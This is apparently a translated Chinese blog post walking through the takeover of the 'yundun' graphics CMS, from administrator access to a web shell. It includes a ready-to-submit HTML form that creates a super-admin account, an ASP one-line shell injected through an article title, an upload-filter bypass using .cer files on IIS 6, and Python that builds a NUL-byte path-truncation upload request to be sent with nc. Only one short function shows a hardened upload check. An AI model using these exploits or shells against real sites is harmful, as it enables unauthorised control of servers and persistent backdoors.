Author: st0p
Please credit the source when reprinting: http://www.st0p.org
The yundun graphic system was written by the same team as the news system covered earlier, so its vulnerabilities are much the same.
How do I get the username and password?
1. The default database path has not been changed: download the database directly and read the username and password out of it. This rarely works.
2. Use SQL injection to obtain the username and the password hash, then crack the hash to recover the password. If the hash cannot be cracked, see my previous article (boiling news system v0.45 take SHELL: http://www.bkjia.com/Article/200909/41690.html).
3. Register an account that is already an administrator. If the registration page is open, save the following code as admin.htm, change the URL in the form's action to the target site, open the file in a browser and submit it.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title></title>
<meta name="author" content="st0p, st0p.org">
</head>
<body topmargin="0">
<!-- change the action URL below to the target site's saveuser.asp -->
<form align="center" method="post" name="FrmAddLink" action="http://www.st0p.org/admin/saveuser.asp">
<div align="center">
<input name="username" value="st0p" type="hidden">
<input name="passwd" value="st0p.org" type="hidden">
<input name="passwd2" value="st0p.org" type="hidden">
<input name="question" value="st0p.org" type="hidden">
<input name="answer" value="st0p.org" type="hidden">
<input name="fullname" value="st0p.org" type="hidden">
<input name="depid" value="1" type="hidden">
<input name="sex" value="mr." type="hidden">
<input name="birthyear" value="1950" type="hidden">
<input name="birthmonth" value="1" type="hidden">
<input name="birthday" value="1" type="hidden">
<input name="tel" value="1234567" type="hidden">
<input name="email" value="webmaster@google.com" type="hidden">
<input name="photo" value="" type="hidden">
<!-- the privilege fields are posted exactly as the back-end "add administrator" form posts them -->
<input name="purview" type="hidden" value="99999">
<input name="oskey" type="hidden" value="super">
<input name="reglevel" type="hidden" value="1">
<input name="jingyong" type="hidden" value="0">
<input type="submit" value="add administrator" name="cmdOk" class="buttonface" style="font-family:; font-size: 9pt;">
</div>
</form>
</body>
</html>
After the account has been added, log in to the admin back end with username st0p and password st0p.org.
The methods above are not the only ways to obtain administrator credentials, but since the subject here is how to get a shell, obtaining administrator information is not examined any further.
How to get a shell?
1. Remote file saving. This only applies to IIS 6, through the IIS 6 parsing bug; for details see my previous article (boiling news system v0.45 take SHELL: http://www.st0p.org/blog/archives/boiling-news-system-v0-45-take-shell.html).
2. Log in to the back end and publish an article whose title is
<% Execute request("st0p") %>
The body can be anything. After it is published, visit http://www.st0p.org/admin/createasp.asp; the page reports that the front page has been regenerated as ASP. Because the title is written into the generated ASP file without escaping, that file now contains the one-line shell: its address is http://www.st0p.org/lastnewsxp.asp and the password (the request parameter that Execute evaluates) is st0p.
3. Another route is to add a script type under System Management > Website Properties > upload types in the back end; asp, php, aspx, cer, asa and so on can all be added there. Then upload the script directly when posting an article. However, the following code in the program refuses asp, aspx and asa regardless of the configured list, so the upload only succeeds for cer, php or some other script type. A shell only results when the server actually executes that extension: on IIS 6, .cer is mapped to asp.dll by default, while php needs a PHP handler to be installed.
FileExt = LCase(file.FileExt)
' UpFileType is the admin-editable, "|"-separated list of allowed extensions
Forumupload = Split(UpFileType, "|")
For I = 0 To UBound(Forumupload)
    If FileExt = Trim(Forumupload(I)) Then
        EnableUpload = True
        Exit For
    End If
Next
' Hard-coded blocklist: only these three are refused, so any other
' executable extension added to UpFileType (cer, php, ...) passes
If FileExt = "asp" Or FileExt = "asa" Or FileExt = "aspx" Then
    EnableUpload = False
End If
If EnableUpload = False Then
    Msg = "This file type cannot be uploaded! Only the following file types can be uploaded: " & UpFileType
    Founderr = True
End If
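To make the filter's behaviour concrete, here is an added Python model of the check above (example code written for this page, not the yundun system's own code). It reproduces the original logic, lists which configured upload types would still reach IIS 6's ASP handler, and shows a hardened check. The constant naming the IIS 6 asp.dll script mappings and the sample UpFileType values are my own.

```python
# Added example for this page, not code from the yundun system.
# Models the VBScript upload-type check quoted above and a hardened version.

# Extensions that IIS 6 maps to asp.dll by default; a file with one of these
# extensions is executed as ASP even though the filter never names .cer/.cdx.
IIS6_ASP_MAPPED = frozenset({"asp", "asa", "cer", "cdx"})

# The only extensions the original code refuses outright.
ORIGINAL_BLOCKLIST = frozenset({"asp", "asa", "aspx"})


def file_ext(filename: str) -> str:
    """Lower-cased text after the last dot, as LCase(file.FileExt) yields."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def enable_upload_original(filename: str, upfiletype: str) -> bool:
    """Mirror of the page's logic: admin-editable allowlist (UpFileType,
    '|'-separated), then a fixed blocklist of asp/asa/aspx."""
    ext = file_ext(filename)
    allowed = any(ext == t.strip().lower() for t in upfiletype.split("|"))
    if ext in ORIGINAL_BLOCKLIST:
        allowed = False
    return allowed


def executable_types_passing(upfiletype: str) -> list:
    """Configured types that the original check lets through and that
    IIS 6 would still hand to asp.dll."""
    configured = {t.strip().lower() for t in upfiletype.split("|")}
    return sorted(configured & IIS6_ASP_MAPPED - ORIGINAL_BLOCKLIST)


# Hardened check: a fixed allowlist of image types that the admin setting can
# only narrow, never widen, plus rejection of anything that could confuse the
# path logic (NUL bytes, path separators, no extension at all).
SAFE_EXTS = frozenset({"jpg", "jpeg", "gif", "png", "bmp"})


def enable_upload_hardened(filename: str, upfiletype: str) -> bool:
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    ext = file_ext(filename)
    if not ext:
        return False
    configured = {t.strip().lower() for t in upfiletype.split("|")}
    return ext in SAFE_EXTS and ext in configured
```

The point of the hardened version is that the server-side allowlist is fixed in code; the admin-editable UpFileType can remove image types but can never add an executable one.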
4. Use the avatar-upload vulnerability in the back end: capture the upload request, modify the filepath parameter and replay it with nc (netcat). uploadfaceok.asp takes filepath from the client and builds the save path from it without any filtering, so truncating the generated file name through filepath (a NUL byte in filepath cuts the path off at that point when the file is saved; this is what the "nc upload" technique relies on, and you can BAIDU it for details) makes the file land under a name of your choosing, which gives a shell. The important part of the code:
......
FormPath = upload.form("filepath")
If Right(FormPath, 1) <> "/" Then FormPath = FormPath & "/"
......
FileExt = LCase(getFileExtName(file.fileName))
' The suffix of the uploaded file name is checked here...
If FileExt <> "jpg" And FileExt <> "png" And FileExt <> "gif" And FileExt <> "bmp" Then
    Response.Write "<span style=""font-family:; font-size: 9pt"">This file format cannot be uploaded [<a href=# onclick=history.go(-1)>re-upload</a>]</span>"
    Response.End
End If
' ...but the upload path (FormPath) is never validated.
Randomize
Rannum = Int(90000 * Rnd) + 10000
FileName = Year(Now) & Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now) & Rannum & "." & FileExt
If file.FileSize > 0 Then ' file data exists
    ' FormPath goes straight into the save path without filtering
    File.SaveAs Server.MapPath(FormPath & FileName)
    Response.Write "<script>parent.document.FrmAddLink.photo.value=previusfile/face/" & FileName & "</script>"
End If
......
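As an added example (written for this page, not code from the yundun system or the original post), the following Python builds the raw multipart POST for the avatar-upload truncation described above and models what the quoted uploadfaceok.asp code does with it. Assumptions not stated on the page: the script lives at /admin/uploadfaceok.asp, the file field is named "file", and the save routine truncates the path at the first NUL byte, which is the behaviour the nc-upload truncation relies on.

```python
# Added example for this page, not code from the yundun system.
# Builds the raw multipart POST for the avatar-upload truncation described
# above and models what the quoted uploadfaceok.asp does with the request.
# Assumptions not stated on the page: the script path /admin/uploadfaceok.asp,
# the file field name "file", and a save routine that truncates the path at
# the first NUL byte.
import random

ONE_LINER = b'<% Execute request("st0p") %>'  # the same ASP one-liner as above
FACE_EXTS = ("jpg", "png", "gif", "bmp")        # the only suffixes the quoted check accepts


def passes_face_check(filename: str) -> bool:
    """The extension check from the quoted code: suffix must be an image type."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in FACE_EXTS


def server_side_path(form_path: bytes, filename: str) -> str:
    """Model of the quoted VBScript: append '/', build the random file name,
    then cut at the first NUL as a NUL-truncating save routine would."""
    if not passes_face_check(filename):
        raise ValueError("This file format cannot be uploaded")
    if not form_path.endswith(b"/"):
        form_path += b"/"
    ext = filename.rsplit(".", 1)[-1].lower()
    rannum = int(90000 * random.random()) + 10000
    generated = f"20091001120000{rannum}.{ext}"   # fixed timestamp for the model
    full = form_path + generated.encode()
    return full.split(b"\x00", 1)[0].decode()


def build_upload_request(host: str, script_path: str, filepath: bytes,
                         filename: str, content: bytes,
                         boundary: str = "----st0pboundary") -> bytes:
    """Raw HTTP/1.1 request bytes; write them to a file and pipe into nc."""
    b = boundary.encode()
    parts = [
        b"--" + b + b"\r\n",
        b'Content-Disposition: form-data; name="filepath"\r\n\r\n',
        filepath + b"\r\n",                      # may contain a NUL byte
        b"--" + b + b"\r\n",
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'.encode(),
        b"Content-Type: image/jpeg\r\n\r\n",
        content + b"\r\n",
        b"--" + b + b"--\r\n",
    ]
    body = b"".join(parts)
    head = (f"POST {script_path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


if __name__ == "__main__":
    # Constructed request: filepath ends in ".asp" followed by a NUL, so the
    # random ".jpg" name the server appends is cut off when the file is saved.
    req = build_upload_request("www.st0p.org", "/admin/uploadfaceok.asp",
                               b"/st0p.asp\x00", "face.jpg",
                               b"GIF89a" + ONE_LINER)
    print(req.decode("latin-1"))
    print("saved as:", server_side_path(b"/st0p.asp\x00", "face.jpg"))  # /st0p.asp
```

The file name the client sends still ends in .jpg, so the suffix check passes; it is the unvalidated filepath, not the file name, that decides where and under what name the content is written.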
That is all for this summary. There are other exploitable spots, but st0p has no time to write them up and other things to do; if you have time, add to it.